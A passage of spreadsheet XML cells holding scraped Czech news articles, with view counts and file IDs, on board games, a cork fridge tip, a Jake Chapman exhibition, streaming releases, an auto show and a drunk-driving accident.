gallery 28 Zvířecí deník a chovatelství 10. 10. 2024 gallery 13 Zobrazit všechny Autor: Martin Burdo Autor person Martin Burdo</t>
  </si>
  <si>
    <t>1280000</t>
  </si>
  <si>
    <t>1060000</t>
  </si>
  <si>
    <t>20241101_143_3265866771_f99983af5e374c287589.html</t>
  </si>
  <si>
    <t>f99983af5e374c287589</t>
  </si>
  <si>
    <t>Jsi na řadě! Znáte všech 10 nejslavnějších deskových her?</t>
  </si>
  <si>
    <t>Jsi na řadě! Znáte všech 10 nejslavnějších deskových her? Stolní hry jako dáma nebo Monopoly jsou populární po celém světě. Ilustrační foto. Tisíce let staré základy, držitel Guinnessova rekordu či původ v době první světové války. Tyhle a další zajímavosti obklopují nejpopulárnější deskové hry. Seznam Zprávy přináší přehled první desítky těch globálně nejhranějších. Článek si také můžete poslechnout v audioverzi. Deskové hry jsou staré jako lidstvo samo. Ačkoli se jejich podoba za ta léta výrazně změnila, jejich podstata zůstává stejná - zábava. Deskové hry jsou fenomén, který nestárne. Naopak, nejen v Česku získává stále více příznivců. Dle údajů České televize si přibližně třetina tuzemské populace zahraje nějakou deskovou hru alespoň jednou měsíčně. Na český trh ročně přibudou stovky nových titulů. Magazín Seznam Zpráv Cestování | Jídlo | Životní styl | Architektura | Historie Vetřelci v české krajině: 10 invazních druhů, jež ohrožují přírodu i zdraví Křišťálové lustry září v Kamenickém Šenově už tři sta let. Jak dnes vypadají? Váš nový přítel chlad: Zlepšuje zdraví i náladu. Pozvete ho domů? Roadtrip po Namibii . Dobrodružství, které musíte zažít Za husou i vínem . 10 tipů, kde si pochutnat na svatomartinských hodech Seznam Zprávy nabízejí přehled desítky nejslavnějších deskových her. Vychází z žebříčku nejprodávanějších deskových her , sestaveného finančním webem GOBankingRates, který cílí na hry s konkrétními výrobci. Přidali jsme i mezinárodně známé deskové hry bez ochranné známky, které se kupovaly a prodávaly v průběhu staletí a dokonce tisíciletí. 1. Šachy Nejprodávanější stolní hrou všech dob jsou bezesporu šachy. Patří k nejoblíbenějším deskovým hrám na celém světě, první zmínka o hře se objevuje kolem roku 600 našeho letopočtu v Persii . Moderní forma šachů se čtvercovanou černobílou šachovnicí se 64 políčky a 16 figurami vznikla v 15. století v jižní Evropě úpravou té perské. Celkový počet prodaných šachových sad od doby zavedení hry není znám, ale jen ve Spojených státech se jich ročně prodají více než tři miliony. Dle zprávy o tržních datech serveru Gitnux hraje šachy odhadem 600 milionů lidí na celém světě. Šachy jsou přitažlivé tím, že neobsahují prvek náhody, ale rozhodují schopnosti a znalosti hráčů. Existuje i barevná šachovnice, která do klasických šachů přidává nový strategický prvek - barvu, za pomocí které lze oponenta kontrolovat a předvídat jeho pohyby. 2. Dáma Dáma je také jednou z nejstarších deskových her. Za jejího prapředka je považována hra zvaná alquerque, jejíž kořeny sahají do starověkého Egypta . V Uru byla nalezena deska připomínající šachovnici z roku 3000 před naším letopočtem. Cílem je vyřadit všechny soupeřovy kameny ze hry pomocí přeskoků. Při hře se používá standardní šachovnice s 8×8 poli a každý hráč má na začátku 12 kamenů umístěných ve třech řadách, které se pohybují pouze po diagonálách směrem k soupeři. Pravidla hry se mohou mírně lišit, záleží totiž na konkrétní variantě dámy a oblasti, kde se hraje. Variantou je například česká, anglická, brazilská anebo takzvaně žravá dáma. 3. Vrhcáby Vrhcáby, známé i pod názvy Puf nebo Backgammon, jsou jednou z nejstarších známých deskových her lidstva. Je doloženo, že se hrály ve starém Egyptě , Sumeru, Mezopotámii a Persii . Hra je především oblíbená v zemích, jako jsou Egypt , Irák , Írán a Turecko - zde pod názvem Tavla. Rozšířená je také v Řecku (v byzantském Řecku známá jako Tabula), Indii (pod názvem Chaupar) a Číně (známá jako Shuanglu nebo Shan -Liu). Hra kombinuje náhodu hodu kostkami se strategickým plánováním. Hraje se na desce rozdělené na trojúhelníková pole, po kterých se pohybují kameny hráčů. Hráči se snaží co nejrychleji dostat všechny své kameny po vyznačené dráze a přitom zablokovat soupeře. Vítězí ten, komu se podaří odstranit z desky všechny kameny. České slovo vrhcáb vzniklo z německého Wurfzabel. Wurf znamená vrh a Zabel je česky tabulka či deska. Vrhcáby patří k oblíbeným hrám například na Blízkém východě 4. Monopoly Nejoblíbenější „značkovou“ stolní hrou jsou dle statistik Monopoly, založené na nelítostném kapitalismu. Jsou držitelem Guinnessova rekordu v počtu hráčů: na celém světě si je zahrálo 500 milionů lidí. Tento rekord byl stanoven v roce 1999, od té doby se s populární hrou Monopoly seznámily další miliony lidí. Od uvedení hry na trh se jí prodalo více než 275 milionů kopií. Princip hry spočívá v tom, umět dobře obchodovat s ulicemi, ale také mít štěstí při hodu kostkou. V meziválečném Československu se hráči mohli pustit do vlastního herního podnikání pod alternativou Monopolů s názvem Business. V této hře si mohli kupovat různé nemovitosti v Praze - od těch nejlevnějších v Braníku až po ty nejluxusnější na Václavském náměstí . Hráči mohli také investovat do infrastruktury - do elektráren, vodáren, telefonních společností a železnic. Zajímavostí je, že u příležitosti Všeobecné československé výstavy v roce 1991 vyšla verze Business Výstaviště. Ještě za socialismu v 80. letech se na trhu objevila hra Dostihy a sázky, která přenesla hráče do světa koní. Ve hře, která se stala obrovským hitem a vyrábí se dodnes, si místo nemovitostí mohou hráči kupovat vlastní dostihové koně a budovat stáje. 5. Scrabble Scrabble, ráj slovních mágů, se prodává ve 121 zemích a je k dispozici ve 29 jazycích. Alfreda Moshera Buttse , autora Scrabble, napadla strategie po pečlivé analýze her s kostkami, číselných her a tahových her, jako jsou šachy a dáma. A tehdy se rozhodl pro slovní hru, která napodobuje křížovky. Hráči se předhánějí v tvořivosti, snaží se vymyslet vzájemně na sebe navazující slova za co možná nejvyšší počet bodů. Scrabble se řadí mezi nejprodávanější hry s počtem prodaných kusů přesahujícím 150 milionů. 6. Cluedo Jedná se o deskovou hru založenou na záhadné vraždě pana Black Peppera v jeho sídle, s cílem tuto vraždu vyřešit. Hráči se pohybují po desce - sídle a sbírají stopy o okolnostech vraždy od ostatních hráčů. Musí zjistit, kde k činu došlo, kdo ho spáchal a jakou zbraní. Hra se opět může lišit v rámci různých zemí a to v pravidlech, postavách, vražedných zbraních, místnostech a v některých případech i v názvu. Hru Cluedo vynalezl Anthony E. Pratt a poprvé vyšla v Anglii v roce 1949. Od té doby se jí prodalo zhruba 150 milionů kusů. Vzniklo i mnoho speciálních herních edicí, nejčastěji s tematikou z populárních filmů a seriálů. Populární deskovky v Česku Největší klasikou, prodávanou v českých zemích už od 19. století, kterou zná asi každý, je hra Člověče, nezlob se! Původ má v indické hře Pačísí, známé už od 7. století, mezinárodně je její obměna rozšířená pod patentovaným názvem Ludo. Nekorunovaným králem českých a slovenských deskových her jsou Dostihy a sázky, s původem v roce 1983 v Jablonci nad Nisou . Vznikly jako obdoba Monopolů, prodaly se jich už asi dva miliony kopií. K dalším kultovním deskovým hrám zvláště oblíbeným v tuzemsku patří dnes například Logik ( Izrael / Velká Británie ), Aktivity ( Rakousko ) nebo Carcassone ( Německo ). V minulosti byly velmi populární také například Halma ( USA ) nebo Mlýn ( Egypt ). 7. Lodě Pravidla jsou snadná. Každý hráč si vytvoří dva stejné herní plány. Na jednom rozmístí své lodě a na druhém si bude zaznamenávat zásahy a minutí soupeřovy flotily. Plánek herních polí bývá většinou čtvercový na 10×10 polí, ale existují i obdélníkové varianty. Hráči se střídají ve „střelbě“ na jednotlivá pole protivníka a ten vždy musí oznámit, jestli došlo nebo nedošlo k zásahu, či jestli jeho loď byla celá zbývajícím zásahem potopena. Zásahy či střely do vody si hráči zaznamenávají barevně odlišnými značkami. Lodě jsou celosvětově známé jako hra na papíře s tužkou a vznikly v období první světové války. V roce 1967 představila americká společnost Milton Bradley verzi hry na plastové desce s kolíčky. Stolní hrou Lodě od společnosti Milton Bradley se inspiroval akční sci-fi film Bitevní loď z roku 2012. 8. Trivial Pursuit Základní herní mechanikou Trivial Pursuit je postupovat po hrací ploše podle hodů kostkou tak dlouho, dokud hráč nezíská všechny potřebné barevné žetony odpovídající jednotlivým okruhům otázek. Žeton hráč dostane za správnou odpověď na dané kvízové otázky. Hra Trivial Pursuit ani tak netestuje vaše znalosti, spíš nabízí příležitost předvést, jak si dokážete vybavit neobvyklá fakta. Během let popularity hry vznikla stovka různých edicí jako například Harry Potter či Star Wars. Hra byla přeložena do nejméně 17 jazyků a prodalo se jí více než 100 milionů kusů ve více než dvou desítkách zemí. 9. Candy Land Hrací plochu tvoří klikatá lineární dráha se 134 barevnými políčky, po kterých se hráč pohybuje podle barvy karet, které si tahá z balíčku. Na hráče číhají i různá překážková políčka, která ho můžou zbrzdit. Vyhrává ten, kdo se jako první dostane do cíle, do hradu z cukru. Candy Land je vhodná hra i pro malé děti, nemusí se při ní složitě přemýšlet. Autorka Eleanor Abbott vymyslela hru, která měla přinést radost dětem postiženým dětskou obrnou v nemocnicích. Sama se totiž v té době v Kalifornii zotavovala z dětské obrny. Hra se stala populární a byla zakoupena více než 50milionkrát. O její popularitě svědčí i fakt, že předloha hry Candy Land se rozšířila do knih, kreslených filmů, kuchařské reality show nebo videoher. 10. Rummikub číselný Hráči si umístí do stojánku destičky s číslicemi, ze kterých vytváří řady vykládáním na stůl. Cílem každého hráče je se zbavit všech destiček tvořením skupin či postupek z čísel. Řady mohou mít podobu postupek stejných barev či být kombinací stejných číslic s různými barvami. Ostatní hráči mohou vyložené řady libovolně využívat a měnit. Oficiální kniha Rummikub, vydaná v roce 1978, popisuje tři různé herní varianty: americkou, sabra a mezinárodní. Rummikub je vlastně obdobou karetních žolíků, ale namísto balíčku obdélníkových kousků papíru jsou zde tvrdé destičky, dnes obvykle plastové. Autor Efrajim Hercano žil tehdy v Rumunsku , kde bylo hraní karet komunistickým režimem zakázáno, a proto přišel s nápadem na hru, která by místo karet používala malé destičky. V roce 1977 se stala nejprodávanější hrou napříč USA a dodnes čítá více než 50 milionů prodaných jednotek. Populární hra na hrdiny: Dungeons &amp;amp; Dragons Opomenout nelze ani hru Dungeons &amp;amp; Dragons, která masivně zpopularizovala fantasy stolní hry a zároveň odstartovala počátek moderních her na hrdiny. Platí také za nejpopulárnější z tohoto typu stolních her. Je přelomová pro začátky celého průmyslu her RPG (role-playing game) a MMORPG (hra obrovského počtu hráčů s RPG prvky).</t>
  </si>
  <si>
    <t>1640000</t>
  </si>
  <si>
    <t>1390000</t>
  </si>
  <si>
    <t>20241101_144_3244663767_6013901d433b0680275f.html</t>
  </si>
  <si>
    <t>6013901d433b0680275f</t>
  </si>
  <si>
    <t>Zátka na víno v lednici pro úsporu elektřiny je hit. Jak funguje a kam ji umístit?</t>
  </si>
  <si>
    <t>Zátka na víno v lednici pro úsporu elektřiny je hit. Jak funguje a kam ji umístit? close Profimedia Kateřina Jelínková 1. 11. 2024 clock 3 minuty video Korkovou zátku od vína máme doma pravděpodobně všichni, pokud tedy nejde o domácnost zapřisáhlých abstinentů. Možná se ale i ti nakonec přidají a kousek tohoto materiálu si přece jen seženou, jakmile si uvědomí, jaké kouzlo s ním mohou zařídit v lednici. Ať se snažíme sebevíc, jsou zkrátka potraviny, které po sobě v lednici zanechají určité pachy. Jsou to některé sýry, ale i salámy, případně houby, pokud je necháme do druhého dne čekat na zpracování. Systémů, jak se tohoto sice většinou příjemného, ale rozhodně nechtěného, odéru zbavit, je více. Někdo používá cibuli, jiný skleničku s octem, ale k osvěžení lednice a pohlcení pachů, které v ní nechceme, může sloužit právě i obyčejný korek. V kanálu SmartFox na youtube se dozvíte ještě více informací: Zdroj: Youtube Nevyhazujte zdánlivý odpad Jak to zařídit, aby korková zátka co nejlépe posloužila i poté, co dopijeme láhev až do dna? Je to velmi jednoduché. Vezměte lahvičku esenciálního oleje a dejte pár kapek na korek. Ten pak jednoduše umístěte do lednice, nejlépe na horní poličku. Během několika málo minut bude celý prostor svěže vonět. Zátku můžete také rozřezat na plátky, na každý kápněte jednu až dvě kapky oleje a rozmístěte je v lednici, včetně poličky ve dveřích. Nepřehánějte to... Pamatujme ale na to, že jde o místo, kde skladujeme potraviny. Jestliže logicky nechceme konzumovat sýr, který je cítit jako houby, nebudeme chtít ani salám s nádechem eukalyptu. Proto i zde platí, že všeho bychom měli užívat s mírou a vybírat takové oleje (a v takovém množství), abychom si nepřidělali více starostí než užitku. Vhodná bude třeba máta nebo citron – uvidíte, že se takový výběr vyplatí. close Korek je materiál získaný odřezáním kůry (borky) dubu korkového. Hlavní výhoda je jinde I když eliminace zápachu je zajímavým důvodem, pro který se můžeme rozhodnout vyzkoušet tento zajímavý nápad, získáme umístěním korku do lednice ještě další, hlavní výhodu. Tentokrát se bude jednat o úsporu energie, tedy elektřiny, kterou lednice pro svůj provoz spotřebuje. Jak je to možné? Korek jakýchkoliv tvarů K tomuto účelu můžete klidně použít více korkových zátek (ale i jiných předmětů, jako jsou vysloužilá prostírání, jež nastříháte na menší čtverečky tak, aby uvnitř lednice nezabíraly příliš mnoho místa). Jak si jistě dokážeme představit, korek je přírodní porézní materiál a jako takový je schopen do sebe nasávat přebytečnou vlhkost z okolního prostředí. Snížením vlhkosti pak dokážeme optimalizovat prostředí v lednici, která bude zapínat kompresor méně často. Tím částečně ušetříme na účtu za elektřinu, což se jistě hodí. Související články video Pro větší efekt Použijete-li korek jako prostředek k odvlhčení lednice, je vhodné jej rozdělit na poměrně malé kousky, které budou mít v součtu mnohem větší povrch, než celá zátka. Nakrájejte ji na kolečka a docílíte mnohem vyššího efektu. V lednici bude sušší prostředí, což kromě jiného také zabrání námraze. Ta je také často důvodem vyšší spotřeby elektrické energie. Nápad k nezaplacení Je to snadné, nic to nestojí a přináší to užitek. Takových nápadů není nikdy dost, a tak by byla škoda jeden takový nevyzkoušet. Je možné, že už zátky od vína nikdy nebudete odkládat nikam jinam, než právě na horní polici lednice. Sledujte nás v Google Zprávách Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Doporučené články facebook instagram pinterest youtube Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. vlm Copyright © VLTAVA LABE MEDIA a.s. všechna práva vyhrazena Publikování, šíření nebo jakékoliv jiné užití obsahu pro jiné než osobní účely uživatele, je bez písemného souhlasu VLTAVA LABE MEDIA a.s. zakázáno. Toto ustanovení platí také pro RSS kanály a jejich obsah. Přihlášení Rádi bychom znali důvod proč se nechcete přihlásit. Odběr newsletteru Chcete pravidelně dostávat výběr nejlepších článků na Váš e-mail? Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Skutečně se chcete odhlásit? Rubrika transition_slide Domov a bydlení</t>
  </si>
  <si>
    <t>88940</t>
  </si>
  <si>
    <t>62010</t>
  </si>
  <si>
    <t>20241101_145_3244483287_5a46c95541cc858d1bd8.html</t>
  </si>
  <si>
    <t>5a46c95541cc858d1bd8</t>
  </si>
  <si>
    <t>Provokatér v&amp;nbsp;Olomouci. Jake Chapman tam vystavuje i&amp;nbsp;sebevražedný trabant</t>
  </si>
  <si>
    <t>Provokatér v&amp;nbsp; Olomouci . Jake Chapman tam vystavuje i&amp;nbsp;sebevražedný trabant Po jedenácti letech se vrátil do Česka britský umělec Jake Chapman , který ještě donedávna tvořil duo se svým bratrem Dinem. Na výstavě Flotsam &amp;amp; Jetsam v olomoucké galerii Telegraph vystavuje svá nejnovější díla. Tu výstavu bylo těžké dostat z hlavy. Nafukovací figuríny provozující orální sex, ohlodané mrtvoly pokryté pavouky, mouchami a červy, africké sochy s artefakty z McDonaldu, zmutované děti nebo souložící nacisté s ohořelými obličeji. To všechno bylo k vidění před deseti lety na výstavě The Blind Leading the Blind v pražské galerii Rudolfinum. Vystavovali tu bratři Jake a Dinos Chapmanovi, světoznámé umělecké duo, které na začátku milénia patřilo mezi světové špičky bořící nejen aukční rekordy, ale i konvence. Absolventi Royal College of Art k překvapení mnoha například přetvořili zachovalý soubor Goyových grafik Hrůzy války, do originálních akvarelů Adolfa Hitlera zase domalovali duhy, smajlíky či srdíčka. Kde vystavovali, tam se o nich mluvilo. Alespoň donedávna. Duo, které v době své největší slávy získalo nominaci na Turner Prize, se v roce 2020 rozpadlo a každý z bratrů se vydal svým vlastním uměleckým směrem. „Nic z naší umělecké praxe nebylo přátelské,“ řekl Chapman před dvěma lety britskému deníku The Guardian „Nikdy to nebyla láska. Vždycky to bylo podbarveno určitým vzájemným opovržením. V jednom okamžiku jsme asi dosáhli kritické míry a rozhodli se jít každý svou cestou,“ řekl Jake Chapman k rozpadu. Otázku, zda se svou provokativní tvorbou uvízli v devadesátých letech, nebo se jim skutečně daří skrze černý humor pronikat až na dřeň lidské povahy, teď znovu otevírá výstava Flotsam &amp;amp; Jetsam . Do olomoucké Telegraph Gallery ji přivezl právě mladší z bratrů Jake Chapman , který svými nejnovějšími díly zaplnil celé spodní patro. „Představte si budoucnost bez lidí. Nastal ten dlouho očekávaný zánik lidské civilizace. Co by na Zemi našel mimozemský antropolog? V prázdné mysli Jakea Chapmana téměř nic. Jen zbytky zaniklé civilizace,“ píše kritik a kurátor výstavy Mark Sanders. Jake Chapman , který na sebe nedávno upozornil prodejem bankovek s pomalovanými portréty krále Karla III. , na otázku odpovídá téměř padesátkou obrazů, soch a objektů. Těmi chce podle svých slov zprostředkovat pocity tísně a kulturní vyprázdněnosti. Foto Matěj Doležel „Třeba plastová brčka jsou beznadějným artefaktem lidstva, podobně jako hippies korálky ,“ řekl Forbesu k některým z použitých materiálů. Ty se na výstavě, která svým názvem odkazuje na text písně Oh, Sister od Boba Dylana , kde se zpívá, že „čas je oceán, ale končí na břehu“, objevují nejen na velkoformátových obrazech, ale i na sochařských objektech, zejména na falešných dřevěných totemech polepených bezlepkovými těstovinami, nejrůznějšími dřevěnými vařečkami nebo právě hipppies korálky . Vůbec nejvýraznějším dílem výstavy je bílý trabant zaparkovaný uprostřed výstavního prostoru s poznávací značkou „extinct“. V pravidelných intervalech se nastartuje a trubicí vedoucí z výfuku za zvuku motoru znovu a znovu tráví a zabíjí své osazenstvo. „Jsem rád, že si trabant mohou návštěvníci vyložit jakýmkoli způsobem. Doporučil bych jim ale podívat se na řadu symbolů, které zdobí karoserii vozu. Ty způsobí, že budou ještě více dezorientovaní zdánlivou trajektorií vozu,“ uvedl umělec pro Forbes. Pro jeho vystavení se prý rozhodl proto, že mu připomíná tříkolku, na níž jezdil jeho dědeček-komunista, který po druhé světové válce uprchl z Kypru do Británie . V malém autě, symbolu Východního Německa , se podle něj také mísí odkazy na pád levice šedesátých let, neoliberalismus let osmdesátých i současný vzestup pravice. Foto Matěj Doležel Na otázku, zda se umělecký přístup Jakea Chapmana po rozpadu tandemu, který tvořil se svým bratrem, změnil, odpovídá nejednoznačně: „Ano i ne“. Na dotaz, zda v Olomouci stejně jako v Praze provokuje, zase říká: „Ne, ne, ne!“ Pokud tedy návštěvníkovi půjde o rozhřešení, zda či jakým způsobem změnil umělecký jazyk, bude si muset poradit sám. Třeba mu k tomu pomůže následující prohlášení k aktuální výstavě: „V jádru mých děl je hluboká prázdnota, která mě tak přitahuje. Když tvořím svoje malby a sochy, ničím v sobě poslední zbytky vkusu. Je to absurdní likvidace mojí vlastní modernistické citlivosti. Je to jako cucat citron a mžourat přitom do slunce.“ Výstava Flotsam &amp;amp; Jetsam trvá do 21. listopadu tohoto roku. Autor: Petra Šimůnková Autor Petra Cieslar</t>
  </si>
  <si>
    <t>23070</t>
  </si>
  <si>
    <t>40000</t>
  </si>
  <si>
    <t>20241101_146_3244505894_418ee6e699a28cf32c95.html</t>
  </si>
  <si>
    <t>418ee6e699a28cf32c95</t>
  </si>
  <si>
    <t>Horor s cestováním časem, skvělé thrillery, Beetlejuice 2 a další novinky (nejen) na Netflixu</t>
  </si>
  <si>
    <t>Horor s cestováním časem, skvělé thrillery, Beetlejuice 2 a další novinky (nejen) na Netflixu Rok 2024 vstupuje do své finální fáze a protože víkend spadá přímo na přelom října a listopadu, je na streamingu rozhodně o co stát. Bavit se totiž můžete jednak napínavými horory či thrillery, ale také novinkami služeb z dalších žánrů. 1. 11. 2024 14:50 | Filmové novinky Netflix už své horory většinově vysypal do éteru v minulých týdnech, vzhledem k Halloweenu ale tasí ještě slasher s cestováním v čase Čas říznout. Pokud ale fandíte spíše thrillerům či dramatům, i pro vás jsou připraveny novinky. Na obrazovky největšího streamera se vrací Diplomatické vztahy s Keri Russell , připravena je i polská novinka Do toho, brácho a kdo nestihl nic sledovat minulý týden, ten by stále mohl věnovat pozornost novinkám Nehýbej se, Tady Zodiac nebo Vlkodlaci z Temného Hvozdu. Na obrazovky Amazonu se vrátil extrémně chválený seriálový thriller s Peterem Capaldim Ďáblova hodina, Apple TV+ přichází s mysteriózním thrillerem Udělali byste to taky o únosu autobusu, který je zahalen tajemstvím. Na Disney Plus byste si rozhodně měli pustit dokument Hudba Johna Williamse o legendárním filmovém skladateli a na Maxu najdete psychologický šachový thriller Odveta nebo dramedii Těžký rok. Komu nevadí si filmy kupovat či půjčovat, ten si pak může užít i novinky Beetlejuice Beetlejuice nebo Borderlands. Z hlediska kvality však doporučíme spíše démonického Michaela Keatona . Níže můžete největší novinky víkendu detailněji prozkoumat: © TMDB V době mezinárodní krize se diplomatka snaží zvládat novou práci na pozici ostře sledované velvyslankyně ve Velké Británii i divoké manželství se slavným politikem. Hrají: Keri Russell , Rufus Sewell , David Gyasi, Pearl Mackie, Ali Ahn, Jess Chanliau, Rory Kinnear , Ato Essandoh 80 % Netflix | české titulky | český dabing | nové díly od 31. 10. 2024 © TMDB V roce 2024 se mladá holka náhodou přesune do roku 2003 a dostane tak šanci zabránit vraždě svojí sestry. Podaří se jí ale změnit minulost a nezničit přitom budoucnost? Hrají: Madison Bailey, Antonia Gentry, Griffin Gluck, Megan Best, Michael Shanks , Rachael Crawford, Summer H. Howell , Sydney Sabiston, Adam Hurtig, Gwendolyn Collins, Samuel Braun 50 % Netflix | české titulky | český dabing | od 30. 10. 2024 © TMDB Ze speciální jednotky dostal vyhazov a teď si jenom těžce zvyká na novou práci u ostrahy. Tam ho ale napadne, jak by mohl vyřešit svoje finanční trable. Hrají: Piotr Witkowski, Konrad Eleryk, Marcin Kowalczyk, Aleksandra Adamska, Anastasiia Pustovit, Cezary Żak, Maya Shopa 68 % Netflix | české titulky | český dabing | od 30. 10. 2024 © TMDB Tři útočníci unesou autobus, avšak nestihnou utéct a jsou zavražděni. Výpovědi všech cestujících se shodují: zachránil je muž s kapucí. Čím déle však probíhá vyšetřování, tím více se stírá hranice mezi hrdinou a zločincem. Hrají: Michelle Jenner , Ana Polvorosa , Ana Wagener , Paco Tous , José Manuel Poga, Pablo Molinero, Elena Irureta , Chechu Salgado, Xavi Sáez, Mabel del Pozo, Pilar Bergés 68 % Apple TV Plus | české titulky | nové díly od 26. 4. 2023 © TMDB A Difficult Year | Francie | 2023 | Komedie | Situace Dva břídilové Albert a Bruno mají za sebou těžký rok. Jsou zadlužení až po uši, nemají kde bydlet a jejich partnerky je opustily. Kvůli chipsům a pivu zdarma se proto klidně přidají ke skupině mladých aktivistů v čele s okouzlující dívkou přezdívanou Kaktus. Zde najdou čerství přátelé příležitost k nekalým kšeftíkům a později také lásku a energii k novým začátkům. Hrají: Pio Marmai, Jonathan Cohen, Noémie Merlant , Mathieu Amalric , Grégoire Leprince-Ringuet, Luana Bajrami, Marie Papillon, Gaia Warnant, Lauriane Escaffre, Yvonnick Muller, Jean-Louis Garçon 60 % Max | české titulky | český dabing | od 23. 10. 2024 © TMDB Rematch | Francie | 2024 | Thriller seriály | Psychologické Strhující psychologický thriller ze světa šachových soutěží na vysoké úrovni prostřednictvím jednoho z největších zápasů mezi člověkem a strojem. Šachová partie mezi Garrym Kasparovem a superpočítačem Deep Blue, byla tak významná, že přiměla deník New York Times k otištění článku s titulkem: V sázce je budoucnost lidstva. Hrají: Christian Cooke, Orion Lee, Sarah Bolger , Trine Dyrholm , Aidan Quinn , Tom Austen, Luke Pasqualino 72 % Max | české titulky | český dabing | nové díly od 17. 10. 2024 © TMDB Od jeho začátků jako jazzového pianisty až k jeho 54 nominacím na Oscara a pěti ziskům zlatých sošek. Tento dokument oslavuje neuvěřitelný přínos legendárního Johna Williamse pro film a popkulturu obecně. Hrají: John Williams , Steven Spielberg , Kathleen Kennedy , Frank Marshall , Kate Capshaw, Gustavo Dudamel , J.J. Abrams, Chris Martin , Ron Howard , Chris Columbus , George Lucas 80 % Disney Plus | české titulky | od 1. 11. 2024 © TMDB Lucy se probouzí každou noc přesně ve 3.33. V jejím životě už dlouho nic nedává smysl, ale odpovědi leží někde na konci série brutálních vražd. Hrají: Jessica Raine, Peter Capaldi , Nikesh Patel , Benjamin Chivers, Phil Dunster, Talia Walker Bassols, Rhiannon Harper-Rafferty, Alex Ferns 77 % Amazon Prime Video | české titulky | nové díly od 18. 10. 2024 © TMDB Beetlejuice Beetlejuice | USA | 2024 | Fantasy filmy | Hororové komedie Dvojka legendární komedie vypráví příběh tří generací rodiny Deetzových, jež se vracejí domů do Winter River. Život Lydie , kterou stále pronásleduje Beetlejuice, se obrátí vzhůru nohama, když její vzpurná dospívající dcera Astrid objeví na půdě tajemný model města a omylem otevře portál do posmrtného života. Je jen otázkou času, kdy někdo třikrát vysloví jeho jméno a rozpustilý démon se vrátí, aby rozpoutal jemu vlastní chaos. Hrají: Michael Keaton , Winona Ryder , Catherine O'Hara , Jenna Ortega, Justin Theroux , Willem Dafoe , Monica Bellucci , Arthur Conti, Nick Kellington, Santiago Cabrera, Burn Gorman 72 % Rakuten | české titulky | český dabing | od 21. 10. 2024 © TMDB Autor: Filmtoro</t>
  </si>
  <si>
    <t>37050</t>
  </si>
  <si>
    <t>49890</t>
  </si>
  <si>
    <t>20241101_147_3244353804_ad6edb5ac3647e9600e3.html</t>
  </si>
  <si>
    <t>ad6edb5ac3647e9600e3</t>
  </si>
  <si>
    <t>Motory řvou, pneumatiky kouří. V Lysé se koná výstava Autosalon a Motor Show</t>
  </si>
  <si>
    <t>Motory řvou, pneumatiky kouří. V Lysé se koná výstava Autosalon a Motor Show Michal Bílek , Veronika Hýblerová - 01. 11. 2024 + 40 Z autosalonu v Lysé v pátek 1. listopadu 2024. Deník/ Michal Bílek Naše téma Na výstavišti v Lysé nad Labem se od pátku 1. do neděle 3. listopadu koná již 28. ročník výstavy automobilů, motocyklů a jejich příslušenství – Autosalon 2024. Součástí výstavy je také doprovodná Motor Show, kde jako každý rok nechybí různé tuningové skvosty, závodní automobily a motocykly. Souběžně s touto motoristickou akcí navíc probíhají i Pivní a vinné slavnosti. reklama Autosalon a Motor Show 2024 v Lysé nad Labem letos přinášejí bohatý program pro fanoušky automobilů a motocyklů. Návštěvníci mohou vidět nejnovější modely různých značek i speciální závodní a tuningové vozy, které se pravidelně účastní tuzemských i zahraničních soutěží. Výstava je rozdělená do dvou hal a venkovních prostor a představí pestrou škálu vozidel od moderních novinek až po klasické veterány. Na video z této akce se můžete podívat zde: Návštěvníci se na výstavišti v Lysé nad Labem mohou těšit i na sekci US Cars Show s ikonickými americkými vozy a na novou truck zónu s upravenými kamiony. Novinkou letošního ročníku je také expozice motocyklových tříkolek Trike. Tuning Show představí různě upravené automobily. K vidění bude i Classic Cars zóna, která potěší příznivce nostalgie ukázkou starších osobních i nákladních vozů. V doprovodném programu se návštěvníci mohou těšit na Drift Show, kde budou mít odvážlivci možnost svézt se v Drift Taxi a zažít, jaké to je jet dveřmi napřed, nebo si vyzkoušet jízdu na motorové driftovací tříkolce. Stylová oslava státního svátku: veterány vyjely z Liberce na tajný výlet Přečíst článek Speciální sobotní Tuning Sraz nabídne hlasování o nejhezčí tuningový vůz, zatímco hudební nadšence potěší vystoupení kapely Argema. Souběžně probíhající Pivní a vinné slavnosti navíc nabídnou ochutnávku českých piv a vín. V rámci slavností budou nabízeny také vynikající pochutiny včetně tradiční svatomartinské husy. reklama</t>
  </si>
  <si>
    <t>33410</t>
  </si>
  <si>
    <t>42410</t>
  </si>
  <si>
    <t>20241101_148_3244353794_6b58aa0d04d18765043d.html</t>
  </si>
  <si>
    <t>6b58aa0d04d18765043d</t>
  </si>
  <si>
    <t>Aš: Řidič měl pozitivní dechovou zkoušku</t>
  </si>
  <si>
    <t>Aš: Řidič měl pozitivní dechovou zkoušku 3 Admin 01.11.2024 V neděli 13. října letošního roku krátce po páté hodině ranní došlo v Aši na Chebsku k dopravní nehodě osobního automobilu. K té mělo dojít tak, že třiadvacetiletý řidič osobního vozidla značky Audi jedoucí ulicí Okružní ve směru z ulice Selbská zřejmě nepřizpůsobil rychlost a narazil vpravo do zadní části zaparkovaného vozidla značky Peugeot . To bylo vlivem nárazu odraženo do dalšího zaparkovaného osobního automobilu značky Ford. Policisté u řidiče po dopravní nehodě provedli orientační dechovou zkoušku na přítomnost alkoholu , která vyšla s pozitivním výsledkem 1,47 promile. Muži byl na místě zadržen řidičský průkaz a byla mu zakázána další jízda. Svým jednáním způsobil škodu přibližně 300 tisíc korun. Chebští dopravní policisté sdělili podezření ze spáchání přečinu ohrožení pod vlivem návykové látky třiadvacetiletému muži z Chebska . V případě prokázání viny mu tak hrozí trest odnětí svobody až na tři roky. nprap. Jan Bílek Autor: 3 Admin || https://www.regionzapad.cz/</t>
  </si>
  <si>
    <t>37</t>
  </si>
  <si>
    <t>119</t>
  </si>
  <si>
    <t>20241101_149_3244521067_54ab09f3c473455cee5e.html</t>
  </si>
  <si>
    <t>54ab09f3c473455cee5e</t>
  </si>
  <si>
    <t>KALENDÁŘ AKCÍ</t>
  </si>
  <si>
